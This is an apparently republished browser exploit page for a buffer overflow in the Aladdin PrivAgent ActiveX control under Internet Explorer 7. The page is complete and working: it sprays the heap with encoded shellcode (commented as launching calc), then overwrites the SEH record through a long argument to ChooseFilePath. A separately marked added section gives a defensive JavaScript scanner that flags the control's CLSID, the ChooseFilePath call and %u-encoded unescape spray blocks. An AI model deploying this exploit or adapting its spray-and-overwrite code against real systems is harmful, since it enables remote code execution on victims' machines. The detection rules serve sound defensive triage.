Aladdin Knowledge Systems Ltd. Overflow
Source: vfocus.net  Author: Blake  Published: 2013-10-16
<html>
<title>Aladdin Knowledge Systems Ltd. PrivAgent ActiveX Control Overflow</title>
<!--
Aladdin Knowledge Systems Ltd. PrivAgent ActiveX Control Overflow
Vendor: Aladdin Knowledge Systems
Version: activex2002
Tested on: Windows 2003 SP2 / IE 7
Download: ftp://ftp.aladdin.com//pub/privilege/activex2002.zip
Author: Blake
Original Discovery: shinnai
 
CLSID: 09F68A41-2FBE-11D3-8C9D-0008C7D901B6
Safe for Scripting: True
Safe for Initialization: True
-->
<object classid='clsid:09F68A41-2FBE-11D3-8C9D-0008C7D901B6' id='test'></object>
  <script>
  
    // heap spray for IE7
    //calc - 196 bytes
    var shellcode = unescape('%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063');
    var bigblock = unescape('%u9090%u9090');
    var headersize = 20;
    var slackspace = headersize + shellcode.length;
    while (bigblock.length < slackspace) bigblock += bigblock;
    var fillblock = bigblock.substring(0,slackspace);
    var block = bigblock.substring(0,bigblock.length - slackspace);
    while (block.length + slackspace < 0x40000) block = block + block + fillblock;
    var memory = new Array();
    for (i = 0; i < 250; i++){ memory[i] = block + shellcode }
    
    buffer = "";
    while(buffer.length < 1224) buffer+="A";
    next_seh = "BBBB";
    seh = "\x0a\x0a\x0a\x0a";   // heap address
    junk = "";
    while (junk.length < 1700) junk+="D";
    
    var payload = buffer + next_seh + seh + junk;

   test.ChooseFilePath(payload);
  </script>
</html>
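
For triage of cached pages, proxy captures or mail attachments, the following added example (not part of the original listing or of any vendor tooling) statically flags HTML that instantiates the CLSID from the header above and calls `ChooseFilePath` on it. The function name `scanHtml`, the rule names and both sample documents are assumptions constructed for this example; the regex matching is a heuristic and does not see script that is assembled at runtime.

```javascript
// Added example: static scan of HTML for script access to the PrivAgent control.
const PRIVAGENT_CLSID = '09F68A41-2FBE-11D3-8C9D-0008C7D901B6'; // from the page header

// Constructed sample inputs (no payload; `arg` is deliberately undefined).
const SAMPLE_FLAGGED = [
  "<object id='pa' CLASSID=\"CLSID:09f68a41-2fbe-11d3-8c9d-0008c7d901b6\"></object>",
  "<script>var pad = unescape('%u9090%u9090'); pa.ChooseFilePath(arg);</script>",
].join('\n');
const SAMPLE_CLEAN =
  "<object classid='clsid:00000000-0000-0000-0000-000000000000' id='x'></object>" +
  "<script>var s = unescape('%u0041%u0042');</script>";

const escapeRe = (s) => s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');

// Scan one HTML document (string) and return a list of findings.
function scanHtml(html) {
  const findings = [];
  const ids = [];
  // Rule 1: an <object> tag that instantiates the PrivAgent CLSID
  // (attribute order, quoting and letter case may vary).
  for (const [tag] of html.matchAll(/<object\b[^>]*>/gi)) {
    const cls = /\bclassid\s*=\s*["']?\s*clsid:\{?([0-9a-f-]{36})\}?/i.exec(tag);
    if (!cls || cls[1].toUpperCase() !== PRIVAGENT_CLSID) continue;
    const id = /\bid\s*=\s*["']?([\w$-]+)/i.exec(tag);
    findings.push({ rule: 'privagent-object', detail: id ? id[1] : '(no id)' });
    if (id) ids.push(id[1]);
  }
  // Rule 2: script calls ChooseFilePath() on one of those object ids.
  for (const id of ids) {
    const call = new RegExp('(?<![\\w$])' + escapeRe(id) + '\\s*\\.\\s*ChooseFilePath\\s*\\(');
    if (call.test(html)) findings.push({ rule: 'choosefilepath-call', detail: id });
  }
  // Rule 3: unescape() of a %uXXXX-encoded literal, the construct used for the
  // spray blocks. Reported only alongside rule 1 to limit noise on legacy pages.
  if (findings.length) {
    const m = /unescape\s*\(\s*["'](?:%u[0-9a-f]{4}){2,}/i.exec(html);
    if (m) findings.push({ rule: 'unescape-percent-u', detail: 'offset ' + m.index });
  }
  return findings;
}

for (const f of scanHtml(SAMPLE_FLAGGED)) console.log(f.rule, f.detail);
```

A hit on the first rule alone is worth reviewing, since the header lists the control as safe for scripting and initialization, so any page can load it without a prompt.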

 